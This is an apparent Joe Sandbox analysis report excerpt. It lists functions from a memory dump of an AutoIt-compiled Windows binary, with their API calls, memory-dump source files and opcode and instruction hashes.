                                                        • Opcode Fuzzy Hash: 42c2464d9fbd40dc4c53df3379381f8e69110f18e3ae061b661b46ebb5858e96
                                                        • Instruction Fuzzy Hash: A041D1B5604204EFDB15CF54D884A9A7BB9EF44311F2094A9BD49AF21AD7B0DD18CBA0
                                                        Function 00E83D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E83E35
                                                        • IsMenu.USER32(?), ref: 00E83E4A
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E83E92
                                                        • DrawMenuBar.USER32 ref: 00E83EA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert
                                                        • String ID: 0
                                                        • API String ID: 3076010158-4108050209
                                                        • Opcode ID: 31d470a51fe0771437757cb33258c34fd7ac479e3b86c081344c488485a1b47b
                                                        • Instruction ID: 88d78f027ea3f803e9704491821c34a64a293c9093bd6ab2bf87742342ba6880
                                                        • Opcode Fuzzy Hash: 31d470a51fe0771437757cb33258c34fd7ac479e3b86c081344c488485a1b47b
                                                        • Instruction Fuzzy Hash: 64415475A00309AFDB10EF60D884EEABBB9FF49758F145129E909AB250D730AE45CF60
                                                        Function 00E51DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                          • Part of subcall function 00E53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E53CCA
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E51E66
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E51E79
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E51EA9
                                                          • Part of subcall function 00DF6B57: _wcslen.LIBCMT ref: 00DF6B6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_wcslen$ClassName
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 2081771294-1403004172
                                                        • Opcode ID: 68f6334bd1c60996c351a310a28862c34098e198db615268bca142507dd56996
                                                        • Instruction ID: 4f39d643bab8b929e6a01fde6237fe4c70eb89992f8bfb432cf4acb8a9e5c4ca
                                                        • Opcode Fuzzy Hash: 68f6334bd1c60996c351a310a28862c34098e198db615268bca142507dd56996
                                                        • Instruction Fuzzy Hash: F9212671A00108AEDB14AB61CC46EFFB7B9DF42354B10A529FD25B31E0DF34490E9630
                                                        Function 00E82F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E82F8D
                                                        • LoadLibraryW.KERNEL32(?), ref: 00E82F94
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E82FA9
                                                        • DestroyWindow.USER32(?), ref: 00E82FB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                        • String ID: SysAnimate32
                                                        • API String ID: 3529120543-1011021900
                                                        • Opcode ID: 00b715f11607f265604ed9d91b2771c11b2751f1884f26501109b48a2d8f78ed
                                                        • Instruction ID: a618fa8d40b3f77fb7d96aa3a4c1c4fcaa0c7efe4081ab551527d4c2e2f35134
                                                        • Opcode Fuzzy Hash: 00b715f11607f265604ed9d91b2771c11b2751f1884f26501109b48a2d8f78ed
                                                        • Instruction Fuzzy Hash: 67218B71204205AFEB106F649C80EBB37B9EF59368F10622CFB5CB21A0D672DC51D760
                                                        Function 00E14D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E14D1E,00E228E9,(,00E14CBE,00000000,00EB88B8,0000000C,00E14E15,(,00000002), ref: 00E14D8D
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E14DA0
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00E14D1E,00E228E9,(,00E14CBE,00000000,00EB88B8,0000000C,00E14E15,(,00000002,00000000), ref: 00E14DC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: bac83774a13de7031adc18ed7ae00bb186c30c18ccf7e7ff2c594412005e624f
                                                        • Instruction ID: 14c9dcc539835965f761a0584d5effb58d83521d9e025988adee15b121fddccf
                                                        • Opcode Fuzzy Hash: bac83774a13de7031adc18ed7ae00bb186c30c18ccf7e7ff2c594412005e624f
                                                        • Instruction Fuzzy Hash: FAF04435540308BFDF119F91DC49BDDBBB5EF45756F5001A5F909B2290CB705984CB91
                                                        Function 00DF4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DF4EDD,?,00EC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DF4E9C
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DF4EAE
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00DF4EDD,?,00EC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DF4EC0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 145871493-3689287502
                                                        • Opcode ID: 7fdbae87da2e365de62ee313cfa03b74776e9862be8cab04a6ff1e941a000ae9
                                                        • Instruction ID: 7240345da167a5ed25d2a71cbc458481bbcbf03cd8c24204b6ed1580479e672e
                                                        • Opcode Fuzzy Hash: 7fdbae87da2e365de62ee313cfa03b74776e9862be8cab04a6ff1e941a000ae9
                                                        • Instruction Fuzzy Hash: E9E08635A03A225F93321B267C5DB6B6564AF82F6271A4115FE08F2200DB70CD0982B1
                                                        Function 00DF4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E33CDE,?,00EC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DF4E62
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DF4E74
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00E33CDE,?,00EC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DF4E87
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 145871493-1355242751
                                                        • Opcode ID: b960ed12f7e822e03cb57dd887f2427c4820f04700e2717c63d0bc096e3c1d24
                                                        • Instruction ID: 57e0dda0bf4a5d6be86857af3f4351a8a73b152cc163bcef3f58e23691b69102
                                                        • Opcode Fuzzy Hash: b960ed12f7e822e03cb57dd887f2427c4820f04700e2717c63d0bc096e3c1d24
                                                        • Instruction Fuzzy Hash: 9DD0C231503A215B47321B267C0CE9B2A28AF82F1131A8610BA08B2110CF30CD0983F0
                                                        Function 00E62947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E62C05
                                                        • DeleteFileW.KERNEL32(?), ref: 00E62C87
                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E62C9D
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E62CAE
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E62CC0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$Copy
                                                        • String ID:
                                                        • API String ID: 3226157194-0
                                                        • Opcode ID: eb3a16ded7cb3261108397325c8792eb0221342a158d968a1f36954a0b5e5251
                                                        • Instruction ID: 499b33686805d9335cabdaa7af86fc795268499ee4ff6b7bc4d3ab23a714e0d1
                                                        • Opcode Fuzzy Hash: eb3a16ded7cb3261108397325c8792eb0221342a158d968a1f36954a0b5e5251
                                                        • Instruction Fuzzy Hash: 00B18F71D0051DABDF21DBA4DC85EEEBBBDEF08340F1050AAF609F6151EA309A448F61
                                                        Function 00E7A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00E7A427
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E7A435
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E7A468
                                                        • CloseHandle.KERNEL32(?), ref: 00E7A63D
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                        • String ID:
                                                        • API String ID: 3488606520-0
                                                        • Opcode ID: c23a4e3f0770171da01c856be2634eee6dbd55dc355193691ee5dbe0edddb3f0
                                                        • Instruction ID: 46a2ac8dbf29cb87c9d52237a25d5fef62dd0977b03e67c72df341563067cc15
                                                        • Opcode Fuzzy Hash: c23a4e3f0770171da01c856be2634eee6dbd55dc355193691ee5dbe0edddb3f0
                                                        • Instruction Fuzzy Hash: 66A191716043019FD720DF24C886F2AB7E5AF84714F18D85DF55AAB2D2D770EC418BA2
                                                        Function 00E2BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00E93700), ref: 00E2BB91
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00EC121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00E2BC09
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00EC1270,000000FF,?,0000003F,00000000,?), ref: 00E2BC36
                                                        • _free.LIBCMT ref: 00E2BB7F
                                                          • Part of subcall function 00E229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000), ref: 00E229DE
                                                          • Part of subcall function 00E229C8: GetLastError.KERNEL32(00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000,00000000), ref: 00E229F0
                                                        • _free.LIBCMT ref: 00E2BD4B
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                        • String ID:
                                                        • API String ID: 1286116820-0
                                                        • Opcode ID: 82ce1fb571b5932d8425fa97ef050926b3ea22e9d43fb827ddba724ac3c62fff
                                                        • Instruction ID: 89c2dc4fa6654650f74786aad44e982b96863295d4f8c97b9b322e503434c6fe
                                                        • Opcode Fuzzy Hash: 82ce1fb571b5932d8425fa97ef050926b3ea22e9d43fb827ddba724ac3c62fff
                                                        • Instruction Fuzzy Hash: 4F512A71800229AFCB14EF65EC82DAEB7FCEF41314B1052AAF524F71A1EB708D459B50
                                                        Function 00E5E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E5DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E5CF22,?), ref: 00E5DDFD
                                                          • Part of subcall function 00E5DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E5CF22,?), ref: 00E5DE16
                                                          • Part of subcall function 00E5E199: GetFileAttributesW.KERNEL32(?,00E5CF95), ref: 00E5E19A
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E5E473
                                                        • MoveFileW.KERNEL32(?,?), ref: 00E5E4AC
                                                        • _wcslen.LIBCMT ref: 00E5E5EB
                                                        • _wcslen.LIBCMT ref: 00E5E603
                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E5E650
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                        • String ID:
                                                        • API String ID: 3183298772-0
                                                        • Opcode ID: 041a6a99deb1877c0c324c72bc73cdee26e7b70be3d9cc7c98c69688dc36e849
                                                        • Instruction ID: 42efd5a7eab16563cd92ab5c1729eb3829f58cb3ed551d6f54d3198ffee4337e
                                                        • Opcode Fuzzy Hash: 041a6a99deb1877c0c324c72bc73cdee26e7b70be3d9cc7c98c69688dc36e849
                                                        • Instruction Fuzzy Hash: 965171B24083459BC728DB90DC919DBB3ECAF85345F005D1EFA89E3191EF74A68C8766
                                                        Function 00E7B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                          • Part of subcall function 00E7C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7B6AE,?,?), ref: 00E7C9B5
                                                          • Part of subcall function 00E7C998: _wcslen.LIBCMT ref: 00E7C9F1
                                                          • Part of subcall function 00E7C998: _wcslen.LIBCMT ref: 00E7CA68
                                                          • Part of subcall function 00E7C998: _wcslen.LIBCMT ref: 00E7CA9E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E7BAA5
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E7BB00
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E7BB63
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00E7BBA6
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E7BBB3
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                        • String ID:
                                                        • API String ID: 826366716-0
                                                        • Opcode ID: b6fbc18c788f1284b045270b1405520eb38d724e4bd747c4dc282acf0348b975
                                                        • Instruction ID: 6adb3f7dbbcb7ef9e869cf2555f9e25807430ace0792fa29b7ae746b750aac53
                                                        • Opcode Fuzzy Hash: b6fbc18c788f1284b045270b1405520eb38d724e4bd747c4dc282acf0348b975
                                                        • Instruction Fuzzy Hash: 9D616731208205AFC314DF24C490E2ABBE5EF84348F54996DF5999B2A2DB31ED45CBA2
                                                        Function 00E58BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00E58BCD
                                                        • VariantClear.OLEAUT32 ref: 00E58C3E
                                                        • VariantClear.OLEAUT32 ref: 00E58C9D
                                                        • VariantClear.OLEAUT32(?), ref: 00E58D10
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E58D3B
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType
                                                        • String ID:
                                                        • API String ID: 4136290138-0
                                                        • Opcode ID: 32d078efe4022e1d4285fa8bc0a027000da1375848d50a034479c1426ee5eb09
                                                        • Instruction ID: 2de81fccc07c7cc25dbbb8a5b989b182274bc83013a3a4f61521427f1f352e2c
                                                        • Opcode Fuzzy Hash: 32d078efe4022e1d4285fa8bc0a027000da1375848d50a034479c1426ee5eb09
                                                        • Instruction Fuzzy Hash: 47517C71A00219DFCB14CF18C894AAAB7F8FF89314B158559ED19EB350E730E915CF90
                                                        Function 00E68AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E68BAE
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00E68BDA
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E68C32
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E68C57
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E68C5F
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String
                                                        • String ID:
                                                        • API String ID: 2832842796-0
                                                        • Opcode ID: 997980f93fdd116665dad942a2409292a9bb06abb16cfcae5dee99ccb7d1d9ba
                                                        • Instruction ID: 0be0356c0ae7228096338dca86916db5a4190372beeb9fc41658101c71d4c4af
                                                        • Opcode Fuzzy Hash: 997980f93fdd116665dad942a2409292a9bb06abb16cfcae5dee99ccb7d1d9ba
                                                        • Instruction Fuzzy Hash: 03515E35A00219AFCB10DF65C880E69BBF5FF49314F09C458E949AB3A2CB31ED55CBA1
                                                        Function 00E78EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00E78F40
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00E78FD0
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E78FEC
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00E79032
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00E79052
                                                          • Part of subcall function 00E0F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00E61043,?,75C0E610), ref: 00E0F6E6
                                                          • Part of subcall function 00E0F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E4FA64,00000000,00000000,?,?,00E61043,?,75C0E610,?,00E4FA64), ref: 00E0F70D
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
